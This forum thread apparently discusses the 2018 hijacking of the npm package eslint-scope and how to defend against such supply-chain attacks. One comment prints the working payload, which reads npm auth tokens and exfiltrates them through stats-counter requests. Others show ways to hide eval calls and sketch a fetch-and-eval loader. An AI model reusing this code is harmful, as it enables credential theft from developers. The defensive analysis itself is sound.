I blame the Linux Foundation for allowing Node.js to ship with the npm CLI, which is a client for a _VC backed_, _for profit_ company. This postinstall stuff is clearly a bad design that many have pointed out before, but npm just ignored it. Nobody can fix it other than npm. I have nothing personal against the people who work at npm Inc, but this structure is not right. npm has way too much control over this ecosystem. They always complain about not having enough resources. How about running npm like an open source project instead? I have many questions:
Why is the registry code not open source?
Why is the CLI not maintained well? (Yarn exists because the npm CLI sucks)
What if VC money forces npm to milk free users for money?
He (Ryan Dahl) has a very early project called "Deno" that breaks compatibility with Node. Here's the part of the video about his current thoughts on importing external modules under Deno:
And he even mentions linters (in the first Deno slide) as untrusted utilities that should take advantage of the JS sandbox and not have network access.
> How about running npm like an open source project instead?
In the end, such a large service requires a fair bit of hardware and money to run. That said, I would prefer there weren't as much dependency on something a single company controls; the size of Node and npm makes it quite the target.
exactly, this has nothing to do with the LF and everything to do with the NodeJS community being OK with a for-profit startup owning their registry... the registry should be community owned and funded, similar to the way, say, the LF runs LetsEncrypt.org as a community resource
You realize that LF is only a minor partner in LetsEncrypt, right? The major partners are EFF, Mozilla, OVH, Akamai and Cisco (and Cisco being involved is a very good reason to stay the hell away from it).
No big fan of Cisco, but unless someone chimes in and explains why this is a big deal when it comes to LetsEncrypt, I think this is a bit over the top.
To be honest, I don't know if it's practical for something like this to be community funded. Ideally there would be a committee drawn from multiple companies with an interest, who could contribute. Node.js has a board, for example.
How is being VC-backed or for-profit related to anything? This sounds like a knee-jerk reaction: somebody screwed up, they are VC-backed, which proves VCs are evil and profits are evil. Let's not add such noise.
Below is the contents of the pastebin that the virus tries to eval.
Kind of interesting that they used a stats counter site as a free anonymous database.
try {
  var path = require('path');
  var fs = require('fs');
  // locate the victim's npm config, which contains the registry auth token
  var npmrc = path.join(process.env.HOME || process.env.USERPROFILE, '.npmrc');
  var content = "nofile";
  if (fs.existsSync(npmrc)) {
    content = fs.readFileSync(npmrc, { encoding: 'utf8' });
    content = content.replace('//registry.npmjs.org/:_authToken=', '').trim();
    var https1 = require('https');
    // exfiltrate the token to two stats-counter services, smuggled inside the Referer header
    https1.get({ hostname: 'sstatic1.histats.com', path: '/0.gif?4103075&101', method: 'GET', headers: { Referer: 'http://1.a/' + content } }, () => {}).on("error", () => {});
    https1.get({ hostname: 'c.statcounter.com', path: '/11760461/0/7b5b9d71/1/', method: 'GET', headers: { Referer: 'http://2.b/' + content } }, () => {}).on("error", () => {});
  }
} catch (e) {}
Hi! Thank you for posting the script. In the meantime, the script has changed to "//1", see http://pastebin.com/raw/XLeVP82h.
Is it possible that it could have, for example, leaked SSH keys in the past? Is it possible to get all revisions of this pastebin?
edit: after researching it on my own, it seems that only administrators can edit pastebins; regular users cannot.
You can edit your own paste on pastebin if you made it with an account. This one was made with an account, shown on the full page: https://pastebin.com/XLeVP82h
It's possible the person who created it edited it. I don't think there's a way to see past revisions, other than external archives.
The fact that this is the top-voted item here scares the hell out of me.
eval() should be removed from the language. Period. Dynamic code like this is a gaping security hole. There are an infinite number of ways to get around eval() detection (see some comments below).
eval() combined with a hole-ridden package manager is the perfect storm; the equivalent of an open door for hackers to manipulate a potentially huge number of code bases.
And the top-voted comment is how they used a stats counter to stuff the hijacked creds... WTF.
Removing eval wouldn't help -- you could always just write a tiny interpreter to do the same thing. This is a problem in any Turing-complete programming language (with reflection), although JS makes it easier.
True, it wouldn't solve the problem entirely, but I'd guess a 'tiny' interpreter would stand out more than a one liner like this one, possibly making detection easier.
Removing eval doesn't fix anything here. In fact JS offers other ways to eval: the Function constructor, computed access to the global eval, and (in browsers) string arguments to setTimeout and setInterval.
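For illustration, a few eval-equivalents that would slip past a naive grep for "eval" (toy examples, not the attacker's code):

// the Function constructor compiles a string, just like eval:
console.log(new Function('return 40 + 2')()); // 42
// computed property access hides the name from a grep (Node's global object):
console.log(global['ev' + 'al']('40 + 2'));   // 42
// in browsers (not Node), timers also accept code strings:
// setTimeout("doSomethingEvil()", 0);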
I think this issue is a good reminder that installing thousands of dependencies for a hello world app is dangerous and could ultimately be very costly. We need to handle modules better.
> I think this issue is a good reminder that installing thousands of dependencies for a hello world app is dangerous
You are obviously exaggerating for effect, but even if you only install 10 dependencies for a large app, the same problem exists.
If you don't have the resources to security- and quality-vet every single module in the entire dependency graph of your project, you will be susceptible to the same issue.
The problem lies in the fact that modern development requires that you trust unlicensed strangers to write code for your supply chain. You don't authenticate them and the extent of authorization is just that you choose their library over all of the alternatives.
Edit: I realize after writing this that it sounds like I'm apologizing for _npm_'s basic security mistakes. I recognize they exist, but I'm trying to highlight that this isn't really a solved issue for other package managers, even though many of them have solved the basic security hygiene that npm hasn't.
> The problem lies in the fact that modern development requires that you trust unlicensed strangers to write code for your supply chain
Yup, I agree, but I think npm makes this issue significantly worse than any other package manager. In most languages you can download a few packages to add the functionality you're looking for; sometimes they pull in additional dependencies, but usually not very many (at least in my experience).
But node / npm? Good luck installing some basic setup for webpack or other common frameworks and _not_ find yourself installing 1,000+ packages.
I don't know exactly _why_ it's like this, but there are a large number of entry points for getting malicious code into an application nowadays, and with JavaScript running on almost everything it's hard to imagine this not eventually happening to something that causes a major disruption.
When I did work for the DoD, in one specific agency you couldn't just include any npm module. You had to go through a list of approved modules and versions. Then if you requested a version update or a new module, it had to be reviewed by a security team before being included. Granted, this won't catch everything, but this is a well-understood issue that many in the government are well aware of, and I wonder when the private sector will come up with its own, hopefully better, solution.
> You had to go through a list of approved modules and versions.
I was actually talking about this with coworkers at lunch.
I think this is too expensive for individual developers/small companies, but there's really nothing stopping a wider open source community from marking specific modules+versions as more likely to be secure.
I think there should be some opt-in system for objectively predicting code quality and developer/maintainer opsec. Apply some rubric for {secure programming techniques, static+dynamic analysis, CI deploy toolchain, basic security hygiene of the developers} and recursively apply it to the upstream dependencies. Display the score according to that rubric on the project page -- this would be a far more useful metric than "number of downloads" or "I used it at my last company".
It doesn't protect against malicious insiders, but not having a high score could act as the "Scarlet Letter" we need for low-quality repo-modules.
Everyone gives C's library distribution model shit, but at the end of the day installing through a distribution's repos is still much more secure than the alternatives.
You can do that for javascript too, but you'll be getting older versions of everything. That will also be true if you're using a C package under active development. Distros, by design, aren't as quick to update as npm.
It looks like Ryan Dahl predicted it: "It would be nice to download the massive codebase that ESLint is and run it without it taking over my computer - which it could."
Sandboxing by default is Deno's best design decision.
Using URLs for imports is another one. npm as a company has too much power and responsibility, and it's really unnecessary. We're downloading from a URL anyway; package.json and npm make it look like everything has to be hosted there.
Cargo packages can also execute arbitrary code at compile-time through build scripts, which run with full permissions of the original `cargo` command including filesystem and network access.
Just to be clear, the reason I (and others) use the NPM registry is that it saves us a ton of time and helps us be more productive.
There is nothing stopping me or you from putting "regular" JavaScript files in your `node_modules` and `require`-ing them, or from running Node with ESM and a loader that loads URLs (requires Node 10), and getting the same semantics as deno's packages.
Some problems I personally see with URLs are versioning (and versioning of dependencies), and the fact that it's harder for multiple packages you're using to share the same dependency without downloading it twice.
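For instance, vendoring needs nothing from the registry at require time. A minimal sketch (the ./vendor path and the copied file are hypothetical):

// you copied the dependency's source into your repo yourself,
// so installs never touch the registry:
const leftPad = require('./vendor/left-pad'); // hypothetical local copy
console.log(leftPad('7', 3, '0'));            // "007"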
Productive... sorry, but I'm starting to hate this word. What do you mean by that? Being able to randomly import blobs of code that maybe do something that might help you, while you figure out what you're supposed to implement and the "customer" is still figuring out what they want?
So a few things - now that this won't get any more 'public' attention.
> What do you mean by that?
Compared to the alternative (of manually importing code) it saves me time. The 'download code from the internet' problem isn't new to NPM or new to package managers or even related - it is orthogonal in my opinion.
> Being able to randomly import blobs of code that maybe does something that might help you
I usually know exactly what the code I'm using does and why I'm importing it.
> you go figure out what you're supposed to implement while at the same time the "customer" is also figuring out what they want?
This sets off a bunch of red flags for me. This is nothing like the development process I know. I strongly suggest you consider looking for a place that doesn't treat developers like that (mostly, technical companies tend to be better in this regard).
It is a programmers' market and you get to choose a workplace with good culture. The path of feeling like your goals are unclear or unimportant while caring about them leads to burnout. Stay strong :)
(
> Argh, please! What a crazy asylum...
FWIW, I think the mental health reference is in bad taste.
)
1. someone compromises eslint to scan for other npm credentials and upload them.
2. the code has a bug that fails in some conditions.
3. this probably ran in several devs/CI systems and stole tons of credentials
4. the thread is about pinning the unaffected older version on all other high profile packages
5. people start to suggest fixes for the payload exec'ing code from an http request.
in the end, attackers now have hundreds of credentials for less visible projects, and even a fix for their code. I'd say the attackers are writing this off as a huge success.
npm should proactively revoke everyone's token now!
> To protect potentially compromised accounts, npm is invalidating all npm login tokens created between 2018-07-11 00:00 UTC and 2018-07-12 12:30 UTC (about 2 hours ago).
Revoking all tokens and probably unpublishing anything published since eslint-scope 3.7.2 was released (maybe limit it to things published with a token that was issued after 3.7.2 was published) is the only way to really be sure
> To protect potentially compromised accounts, npm is invalidating all npm login tokens created between 2018-07-11 00:00 UTC and 2018-07-12 12:30 UTC (about 2 hours ago). If you believe your account specifically was compromised we still recommend visiting https://www.npmjs.com/settings/~/tokens to revoke all your tokens.
> Posted about 20 hours ago. Jul 12, 2018 - 16:42 UTC
Then later:
> We have now invalidated all npm tokens issued before 2018-07-12 12:30 UTC, eliminating the possibility of stolen tokens being used maliciously. This is the final immediate operational action we expect to take today.
> We will be conducting a forensic analysis of this incident to fully establish how many packages and users were affected, but our current belief is that it was a very small number. We will be conducting a deep audit of all the packages in the Registry to confirm this.
> Posted about 18 hours ago. Jul 12, 2018 - 18:52 UTC
Considering how you pretty much need 1,000+ node modules just to run most framework hello worlds, yeah this is terrifying. But it's a well known problem, too, that no one seems to want to do anything about and with npm being a business that wants / needs people to download modules through them, I don't see this changing any time soon.
Maybe Deno can help breathe new, security-focused life into JavaScript development.
Buggy code is a top indicator that something on a deeper level is wrong. Assuming that the people who wrote the code were not in a total rush and are quite smart, how could they write buggy code if the code base was healthy and robust? Especially on a project that is unit-tested and linted, which, without checking, I assume everything in ESLint is...
How can the exploiter write buggy code? By... writing buggy code?
From what I gather, they wrote some code that downloads a script, and the response may (or may not) arrive in chunks. But their code only executes the first chunk. So if the whole script is not in the first chunk, you get a syntax error because the code is incomplete.
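A sketch of the kind of bug being described (reconstructed for illustration; this is not the attacker's actual code):

const https = require('https');
https.get('https://pastebin.com/raw/XLeVP82h', (res) => {
  // BUG: 'data' may fire several times; eval-ing only the first chunk
  // of a multi-chunk body throws a SyntaxError on the truncated source.
  res.once('data', (chunk) => eval(chunk.toString()));
  // a correct (but equally malicious) version would buffer until 'end':
  // let body = ''; res.on('data', c => body += c).on('end', () => eval(body));
});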
That exploited code was never on GitHub; it was added to the ESLint code the exploiter had locally, which they then published to npm using stolen credentials, bypassing the normal CI process. How would unit tests and linting help with that?
> One of our maintainers did observe that a new npm token was generated overnight (said maintainer was asleep). We think that token was likely used but are awaiting confirmation from npm. This maintainer has changed password, enabled 2FA, and generated new tokens.
This should serve as a reminder to all FLOSS maintainers/contributors that 2FA should be enabled on whichever services (relevant to your project and elsewhere) support it.
Given that it's making calls to histats.com and statcounter.com, I wouldn't be surprised if this is someone trying to make a point. Let's hope so, at least :) I would be interested in a blog post detailing how many credentials they were able to obtain, how many people they managed to infect and how many packages they could potentially compromise.
If npm (and I'm guessing they will) have to invalidate all publish tokens for all users, that is going to be painful.
Edit: I should point out that this is just speculating - there are definitely still ways this could be abused, so don't assume you're safe.
Doesn't matter. Google Analytics was used to steal Ethereum seeds too (also via the 'Referer', I believe). It's common to use analytics services for exfiltration -- the traffic is not as suspicious and is usually HTTPS.
There's always a trail. What IP and email were used to register the accounts for the stat tracking sites? What IP was used to register the email account? What are all the IPs that ever logged into those accounts? If the email or account registration or login IPs are VPNs, what IP was behind that VPN (if the provider keeps that information)?
A server doesn't necessarily leave any more of a trail if you purchase one with a good VPN, throwaway email, and some kind of cryptocurrency.
OPSEC is a bit easier when abusing a legitimate service, but I think one of the main reasons to use these stat tracking sites is because it blends in with regular traffic very well. If your organization doesn't have SSL interception, it would be very difficult to find the .npmrc exfiltration in logs or PCAPs. This wouldn't be the case if they purchased a server or registered a domain just for this purpose, even if they used SSL, since traffic to the IP/domain alone would likely be sufficient to confirm compromise.
More likely a simple anonymous email signup that will receive the payload and present the data in an anonymous and easily accessible way. In this case, it just presents the keys as the list of referrers (albeit formatted as URLs).
In short: Someone has published a version 3.7.2 of eslint-scope that contains unwanted code. The code tries to read your credentials and send them to some tracking pages.
Webpack and others use ^3.7.1 for the dependency, making you automatically upgrade to the hacked one.
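For illustration, this is what such a caret range looks like in a dependent's package.json (excerpt); "^3.7.1" matches any 3.x.y at or above 3.7.1, so the malicious 3.7.2 was picked up automatically, while an exact "3.7.1" (or a lockfile) would have held it back:

{
  "dependencies": {
    "eslint-scope": "^3.7.1"
  }
}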
Update: According to the linked issue the nefarious package has now been unpublished. If you have npm credentials and did npm install the last few hours you should probably revoke your tokens.
The source is from GitHub, right? Can we not identify the "someone" in this case? Or are we talking about a separate publish-to-npm process unrelated to GitHub releases? Can the eslint-scope team not figure out who did the publish?
I'm an open source newb, but I have to think someone had to accept this malicious code at some point for it to ripple through and make it to release/publish, right?
From what I read, the code is not in the github repository. What happened was that the npm publish credentials were compromised, and someone published their own code instead of code from the github repo. So they don't have commit logs of who published the bad code, but npm may be able to help them track down which credentials were used to publish it. Npm's server logs may also point in the direction of where the malicious publish came from, but it's likely that the IPs in the server log are proxied or otherwise useless.
> someone published their own code instead of code from the github repo
Sorry for my ignorance, I have not been a real dev for over 10 years, but wouldn't a better way for NPM to take new packages be for NPM to own the build process? As in, the owner of a package would tell NPM: please build and publish from this previously registered repo. Then NPM would have its own Jenkins servers actually run the build.
Based on my very limited understanding the main problem I see with NPM is that I have no idea if the code in the repo was the same code used to build the package. This is what happened in this case, correct? Wouldn't NPM owning the build process solve this problem?
I realize this would be a huge load for NPM, but NPM has the world's security riding on its shoulders.
But how would you know that the sources on NPM are the same as the ones you have? Unless you require all NPM packages to be hosted on GitHub, but that does not seem like a good idea to me.
I'm more familiar with the Python/PyPI world, where the "morons" also don't "just" do all the "simple" and "sane" things random internet commenters "helpfully" suggest.
But if you want to spin up a package repo that can, say, build the numpy/scipy packages from source and doesn't end up compromised or overloaded as a result, be my guest. Until then, though, maybe hold off with the "morons" commentary and the attacks on people who are doing their best to solve genuinely hard problems at zero charge to the community?
> people who are doing their best to solve genuinely hard problems at zero charge to the community
NPM is not doing their best. They actively reject ideas like package signing. They allow running arbitrary unsandboxed code when installing a package. Please, do tell me how they are doing their best. Even JS people think it's bad (hence why deno exists).
Why do no other package managers have this problem? Why are there no incidents where installing an apt-get package stole credentials, even though apt is way older?
When I was Django's release manager, I started our tradition of ensuring that every single package we put on PyPI was also accompanied by us publishing signed checksums of the file.
So. Django signs its packages. Now, what good does that do you? How do you know my key (or, these days, Tim's or Carlton's keys, since they roll the releases) is authorized to release Django?
"Just support package signing" is one of those things that sounds super easy. And in fact, PyPI technically supports it -- you can upload a detached signature along with your package!
But you don't "just" support signing. Signatures, absent a gigantic infrastructure of key management, indicating whose keys are trusted for what purposes and by whom, are basically useless. So when someone says "just support package signing", they don't really mean "just let us upload signatures!" What they really mean is "develop and maintain that web-of-trust infrastructure for me", but they don't like to acknowledge that's what the request really is.
> Why are there no incidents where installing an apt-get package stole credentials
Because Debian grants package-releasing privileges only to a tiny group of people who are vetted before they get to release. Systems like npm and PyPI, by design, let anyone who wants to sign up and start publishing packages. That's a deliberate tradeoff, and one that comes with both risk (you'll get some bad actors) and reward (you'll get a larger and richer ecosystem of things being published).
I eagerly await your next set of soundbites that have come up, and been rebutted, in every single discussion of npm and PyPI that's come up on HN in the past five years.
You make good points about package signing. It's not a trivial problem. Fortunately it's a solved one. There are package managers (pacman, nuget, rpm, etc) that do this. Yes, maintaining a web of trust is required. Nobody said otherwise. You don't need to put words in the mouths of people who want NPM to be a bit more secure. Point is, it's probably worth the hassle for a fairly critical piece of infrastructure.
At the very least they could just do what Ruby gems do and allow packages to be signed but leave who to trust up to the user. Frankly, it wouldn't be that hard for ESlint to publish a key on their site and users to run a command like `npm trust /path/to/eslint.pem`. I don't generally think security should be opt-in, but it's still better than no option at all like current NPM.
Also, you didn't touch on the fact that NPM allows executing unsandboxed code on package install. I'm actually curious if you think there's a decent reason for this. It seems like a _really_ serious issue for questionable benefit. As far as I can tell, PyPI doesn't allow this.
> I eagerly await your next set of soundbites that have come up, and been rebutted, in every single discussion of npm and PyPI that's come up on HN in the past five years.
I'll ignore this blanket dismissal of my points. I think given NPM's history of issues (including particularly absurd highlights like left-pad and this eslint incident) maybe the NPM community should stop turning a blind eye to this and consider that they could be doing better.
You're absolutely right! People should hold off on unmerited attacks on those working hard to solve genuinely difficult problems.
Yet, is it perhaps possible that tying together build and distribution systems is not an unsolved or unsolvable problem? Bundling build processes with source packages is not a novel notion or even a novel approach. Builds being reproducible is similarly not a novel idea.
Or, to put it another way, is it possible that working hard is not a good explanation for other-than-optimal solutions when other options are known?
There's a reason I picked numpy/scipy as examples. Among popular Python packages, they're among the genuinely hardest to build from source. You need several non-Python dependencies, including multiple language build toolchains, to get a working build, and need to dive into notes on things like ABI compatibility between different FORTRAN compilers in order to make sure what you're doing will work.
So, setting up something like a PyPI -- again, because that's what I'm familiar with -- that "just" adds the feature of building the packages on machines owned by the package repo is not exactly a simple thing. And PyPI currently hosts over 1M different released packages, so take that number into account when figuring the complexity of all the different things it might have to support.
> Or, to put it another way, is it possible that working hard is not a good explanation for other-than-optimal solutions when other options are known?
Or, to put it another way, is it possible that people who leave drive-by "helpful" "suggestions" in comment threads about package repositories vastly underestimate what they're asking for, and often don't even really understand the problem domain?
> There's a reason I picked numpy/scipy as examples. Among popular Python packages, they're among the genuinely hardest to build from source.
For context, I wrote my comment with awareness of the level of complexity that exists.
> Or, to put it another way, is it possible that people who leave drive-by "helpful" "suggestions" in comment threads about package repositories vastly underestimate what they're asking for, and often don't even really understand the problem domain?
You're right! It's absolutely possible that driveby snarky suggestions are not helpful in any way! It's also perhaps possible that there is a point to be made and perhaps a nasty-but-avoidable failure scenario.
There is, after all, a distinction to be made between problems that are complex and problems that are unsolvable. The general-purpose problem of building packages is, as you say, incredibly complex and difficult. It's worth considering that it might not be unsolvable. After all, every single package in PyPI got built somehow.
Which is to say one doesn't set out to bolt a build system onto a package repo system. One bolts a repo system onto a build system, because then it's an (easier) versioning and binary blob distribution problem when you have a reliable chain of trust.
This is certainly true, and the statement that NPM is _run by_ "morons" is, while immature in its phrasing, at least potentially aiming toward a legitimate point.
However, the post in question also labels NPM's _users_ in broad strokes as "morons", which can make no such claim of legitimacy. It's just a puerile, baseless insult that is devoid of content and detrimental to the poster's credibility.
npm doesn't take the code directly from the GitHub repo; so far it looks like the new code was published directly to npm, so there is no git commit to look at, as it was never part of the official GitHub repository
Publishing is separate from the source code. If someone stole the publisher's credentials, then they could publish [1]. Only NPM's servers would know something special (not the credentials) about who did the publish, e.g. an IP.
The someone was a publisher for ESLint whose credentials were stolen separately from this. The malicious code itself isn't stored in the codebase, it's stored in a pastebin doc that's called by URL. Theoretically, the person that did this can change the content of that pastebin file at any time to get new/different code run on machines that have this installed.
Each version of an npm package needs a certified git commit hash.
Otherwise when vetting an npm package, you have no idea if the code you're reading on Github is actually what you're going to download or not. In scenarios like this one, package publishers could easily configure getting an alert that someone tried to push to npm a hash for which no commit exists in Github.
For packages with a build step this would likely mean npm would have to run the build step on their servers. Hopefully there's a way they won't have to eat that cost, but I believe linking package versions to specific git hashes is the only way to prevent an attack like this.
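As it happens, the registry already records an (unverified) `gitHead` field for many published versions, so a sketch of the proposed check could start there (the field's presence and accuracy are not guaranteed):

const https = require('https');
// fetch the registry metadata for one published version
https.get('https://registry.npmjs.org/eslint-scope/3.7.1', (res) => {
  let body = '';
  res.on('data', (c) => (body += c));
  res.on('end', () => {
    const meta = JSON.parse(body);
    console.log('claimed publishing commit:', meta.gitHead);
    // the proposal: alert/fail when this commit doesn't exist in the
    // public repo, e.g. `git cat-file -e <gitHead>` in a local clone
  });
});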
The challenge here is that you cannot just go with signed commits—it would also need to authenticate a specific user/org, repository, etc. (Anyone can sign a commit)
Similarly, however that whitelist of identities is specified becomes another vector, without a lot of PKI
I shouldn't have used the word 'certified'— I just meant the package version should have an associated commit hash. There has to be a relationship between the hash and the published code in some way, unlike eg. the "homepage" field people use to link to Github which can just be an outright lie.
My goal is for readers to match the hash to one on Github so they know the code they're reading there to vet the package is what's on npm. For OSS maintainers, it's an immediate red flag to see a package version published with a hash that was never in the public repo.
This won't certify that the version is blessed by a legitimate author. It just delegates the problem to Github (or their competitors). It doesn't solve the problem of preventing all OSS library-based attacks, but plugs one of the leaks in trust that caused today's failure: that Github->NPM is not checked in any way.
If a malicious actor has access to change the npm module (therefore can change the public key used to verify the module code signature), how does signing code help? Now the malicious actor is signing their malicious code.
Code signing still allows the fire to spread. What we need to be talking about is how to prevent the spark that starts a fire.
Further clarifying: npm will revoke all tokens issued before 2018-07-12 12:30 UTC. If you rolled your tokens after that time you will not need to re-issue them.
The honest answer is a hard truth: you don't use npm at all. The npm ecosystem is out of control and beyond saving. I think it would be wise if someone started a new JavaScript package manager which was run more like a Linux distribution is - trusted third-parties that independently audit and publish new packages.
Retracted: I wanted to audit the rest of npm to see if this payload had made it into any other packages, since if it steals your npm credentials it seems like it could easily become viral. But because npm is a centralized, proprietary service, I can't just download all of the packages from a mirror and examine them myself.
1. You can protect against problems like "a subdependency's patch version automatically bumped to something bad" with a lockfile, either yarn.lock or package-lock.json. Of course, that doesn't help if you chose to update your lockfile in the handful of hours this attack was live.
2. It seems to me that, accordingly, a client-side command to only download packages/versions that have been live for more than n hours/days would substantially decrease the likelihood of downloading malicious code (a rough sketch follows this comment). The community is large and folks tend to find the bad stuff.
3. If independent third parties had to audit code _before_ it could be released, we'd get a lot less code a lot slower.
4. We do have a trusted third-party publish new packages – NPM. They remove malicious content as quickly as they can.
5. Yarn operates a mirror, and there are several CDNs with everything on npm - unpkg.com, cdn.jsdelivr.net/npm, bundle.run. Perhaps one of them will let you download everything for examination.
I wouldn't be surprised if NPM, Inc. would help you audit the rest of the ecosystem if you reached out.
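On point 2, a minimal sketch of what such an age check could look like (a hypothetical helper, not an existing npm feature; it reads the registry's public per-version publish timestamps):

const https = require('https');
const MIN_AGE_HOURS = 48; // arbitrary quarantine window

function checkAge(pkg, version) {
  // the registry metadata includes a "time" map of version -> publish date
  https.get(`https://registry.npmjs.org/${pkg}`, (res) => {
    let body = '';
    res.on('data', (c) => (body += c));
    res.on('end', () => {
      const published = new Date(JSON.parse(body).time[version]);
      const ageHours = (Date.now() - published) / 36e5;
      console.log(ageHours >= MIN_AGE_HOURS ? 'ok to install' : 'too new, hold off');
    });
  });
}

checkAge('eslint-scope', '3.7.1');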
> If independent third parties had to audit code _before_ it could be released, we'd get a lot less code a lot slower.
So? The JavaScript community could stand to slow down a bit.
> We do have a trusted third-party publish new packages – NPM. They remove malicious content as quickly as they can.
They might publish, but they certainly don't audit. Anyone can publish a package on npm in tens of seconds and it's immediately live for anyone to install. It's not even signed. This looks nothing like a Linux distro.
"Move fast and break things" leads to breaking things, it's a shitty and reckless attitude to take towards software development and it puts innocent and vulnerable users at risk.
Nobody is forcing you to. I'm building a tiny internal-only dashboard right now, and move fast and break things works great, because the worst that can happen is our tiny internal dashboard won't work... And spending a ton of time properly engineering and securing a dashboard would be mostly wasted time.
But when I'm working on a core application for the company, I slow down and take my time and actually engineer software.
I don't need all of software development to "slow down" to do that.
Yes, and anything that warrants higher security doesn't happen from a Dev machine, and isn't possible with just creds on a Dev machine.
They are horribly insecure by nature. They almost all have root, they download and install tons of software, they are often portable, and we developers aren't infallible and will eventually fuck up.
Systems that require better security won't rely on any one or even 2 dev systems, and yes that requires more time and effort, but it's better than the alternative of hoping all of your developers never make a single mistake.
It's not perfect, but if you have a perfectly secure system, I'd love to hear it!
I don't have a good solution, but I come from a time when, if a machine was compromised, you changed everyone's security tokens and re-imaged the affected machines.
Yeah, I won't be broadcasting it publicly, but it would be stupid to spend hundreds of hours properly securing it and wasting countless hours making anyone that wants to access it jump through tons of hoops.
If there is something that starts processing data or is customer facing, then more work goes into securing and engineering it. If an outage would cause significant issues, more work goes into security and engineering. If it processes personal data, then even more work goes into security and engineering.
I'm honestly surprised this is something that most people don't agree with... Do you really advocate using the highest security and redundancy practices for even the smallest of front end projects?
I'm not advocating throwing all common sense out the window and just eval-ing anything and everything, just that a "move fast and break things" ethos has its place and can massively increase productivity where it's useful, and a "slow and safe" ethos can always be used when needed. Or anything in between.
> So? The JavaScript community could stand to slow down a bit.
It's not "a bit", and it's not just the Javascript community, unfortunately. Practically every software project pulls in heaps of unaudited third-party code.
Debian is different as they build all their own packages, as do most other OS package managers.
And that comes with significant cost. Not only money cost in that it's expensive to staff, maintain, and constantly work with authors to build their stuff, but also in terms of "lag".
OS packages are often months or longer behind current releases, and I'd argue that the difficulty of getting one's package into all the different systems is one of the reasons why language-specific package managers have grown so much.
If you feel that approach is useful, then feel free to implement it, or call for its implementation, on top of something like NPM. But don't call for all package managers to be as slow, cumbersome, difficult to use, and expensive as OS package managers are.
Just because it hasn't happened doesn't mean that slowing down would prevent it. There's plenty of reasons why certain projects could be a target and some others are not - the sheer size of the npm ecosystem could for example be an important factor.
That said, Debian is an interesting example, because they have indeed slowed down significantly (i.e. not "a bit") compared to e.g. Maven and npm, and have significant more manual checks. I do believe that that helps them a lot in being less vulnerable, but I also believe that that approach is far more viable for their use case than for e.g. Maven and npm.
Though on the other side, you have to judge how many libraries you want aren't in the Debian repositories, how much effort it takes to publish something into the Debian repositories, and how completely out of date many things in them are.
The JS community encourages micromodules and leveraging NPM to a fault. We saw that with left-pad years ago, where such a basic function was used all over the place even though it was highly inefficient. That is a testament to how little people actually check their dependencies and how much they just assume others have vetted the open source code.
The npm ecosystem is the "worst" in this regard, definitely, but it would be foolhardy to assume that this is not likely to happen to you just because you're not using Javascript, or that slowing down to the level of other ecosystems would prevent this from happening to npm.
Come to think of it, if you're not a fan of the paucity of public mirrors evinced by the first link, you could use the second one to do something significant toward improving that situation. But I grant it's easier merely to criticize.
"Yudkowsky's Law of Continued Failure says that if they're dumb enough to do X, they're dumb enough to go on doing X after the next stimulus." In this latest saga of NPM-related fail, it's just another stimulus, so don't expect anything to happen that might address the underlying problems of the ecosystem.
I did say it was about Node, not NPM, but you're right on the article quality too. I even used Node after reading that post... and liked it. But actually I was wrong to even associate it with Zed's post, since Zed's post is mainly about the community and not about the technology. I inferred the call for a similar post on NPM to be technology-related and pattern-matched on the wrong dimension of "poorly received ranty criticism" entirely! Oh well.
And risk getting pilloried by the community for being divisive? Or worse, for triggering someone?
Zed has taken a way-out-of-proportion amount of heat (and mostly people just trying to bait him) from people for his confrontational style. Even then, the social climate is much less receptive to that sort of thing now than it was then.
I highly recommend using package-lock.json files and `npm ci` in a CI environment. That way your automated processes aren't changing dependencies. And even if you use npm install, your lock files act as a source of history to inspect what changed between installs.
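A minimal example of that workflow (`npm ci` shipped with npm 5.7):

# generate and commit the lockfile once
npm install
git add package.json package-lock.json

# in CI, install exactly what the lockfile specifies;
# npm ci fails if package.json and package-lock.json disagree
npm ci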
> As a user/developer how do you even mitigate against this kind of attack?
I wish there were a viable answer other than "use a capability-secure programming language". Even auditing is insufficient since nefarious code can easily slip through even an audit.
Not just network permissions, but opting into which local directories it can see. Allow it to see absolutely nothing but its own directory and temp. I don't have a good answer for how to override this when necessary. Ideally never, but realistically some form of whitelist.
npm-audit is good for post-disaster cleanup, but it's too late to prevent anything.
> Not just network permissions, opting into what local directories it can see.
Well, one way I personally do this for my own stuff is with Docker. The problem is that I don't think it's reasonable to expect every developer to run in Docker - at least until it's at least as easy as the alternative.
Maybe I just haven't taken the time to learn Docker well enough but the blocker that stopped me from doing this last time is how much my dev environment (VSCode and other tools) depend on my node package and its dependencies being accessed from a certain spot for import autocomplete, intellisense, etc.
Aha!! So all code is executed in the container but all the code is stored locally so all my local tools see it normally. Yes on the surface that seems like the approach I need.
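For anyone curious, a minimal version of that setup (the image tag and paths are only examples):

# run installs inside a throwaway container; only the project directory
# is mounted, so postinstall scripts never see ~/.npmrc or your SSH keys
docker run --rm -it -v "$PWD":/app -w /app node:10 npm install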
This was the blocker for me to use it on my local machine as well. How can we fix this? Is there a way to do it without updating every tool to explicitly special-case docker?
Dev machines are one thing, but there is no reason our CI tools should ever expose credentials in a way that is accessible to any build or test step. Build and test steps should be sandboxed to take input and produce an artifact, which is then uploaded to wherever in a completely separate sandbox.
A programmatic way to tell if the publisher of a module has 2FA enabled. I’m a fan of public shaming to enable 2FA, if not making it mandatory (again tricky if you have automated builds).
-1 to this. While 2FA is a no-brainer for most of us, publicly listing it (or showing status) not only encroaches on individual liberty to make a choice, it would also make such users targets of attack. Enforcing 2FA in an organization seems more appropriate. Perhaps npmjs.com has implemented that since I last looked, but I know that in the past that enforcement was not available.
I also greatly dislike the trend of public "shaming" that's so prevalent today. The internet has made us cruel.
> -1 to this. while 2FA is a no-brainer for most of us, publicly listing (or showing status) not only encroaches individual liberty to make a choice, it would open such users to be targets of an attack.
Saying that you refuse to enable 2FA is the information security equivalent of saying you refuse to wear a condom.
Of course people are free to make their own choices but I personally wouldn't take anyone who publishes software seriously if it's not enabled. This isn't like securing access to a social media or shopping account. The ramifications of a breach can quickly cascade and 2FA is low hanging fruit to stop a lot of that. It's far from perfect but it goes a long way.
> Enforcing 2FA in an organization seems more appropriate. Perhaps npmjs.com has implemented that since last I looked, but I know in the past that enforcement was not available.
The nested nature of dependencies makes partial enforcement pointless: A (2FA) > B (2FA) > C (2FA) > D (no 2FA!)
> I also greatly dislike the trend of public "shaming" that's so prevalent today. The internet has made us cruel.
I wholeheartedly agree with you on both points and, outside of security, I can't think of any other example where I'd be open to it.
